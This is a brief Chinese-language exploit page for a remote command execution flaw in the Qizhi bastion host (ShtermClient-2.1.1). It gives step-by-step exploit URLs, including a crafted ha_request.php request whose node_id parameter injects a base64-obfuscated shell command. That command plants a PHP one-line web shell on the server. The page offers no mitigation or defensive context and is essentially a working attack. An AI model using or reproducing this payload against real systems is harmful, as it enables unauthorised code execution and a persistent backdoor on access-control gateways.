齊治堡壘機前台遠程命令執行漏洞_zh-hans

# 齊治堡壘機前台遠程命令執行漏洞/zh-hans

==漏洞影响==

ShtermClient-2.1.1

==漏洞利用==

==漏洞利用==
1.訪問 http://10.20.10.11/listener/cluster\_manage.php 返回OK;

2.訪問如下鏈接生成一句話木馬

https://10.20.10.10/ha_request.php?action=install&ipaddr=10.20.10.11&node_id=1${IFS}|`echo${IFS}"ZWNobyAnPD9waHAgQGV2YWwoJF9SRVFVRVNUW3NoZWxsXSk7Pz4nPj4vdmFyL3d3dy9zaHRlcm0vcmVzb3VyY2VzL3FyY29kZS9zaGVsbC5waHA="|base64${IFS}-d|bash`|${IFS}|echo${IFS} 
© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容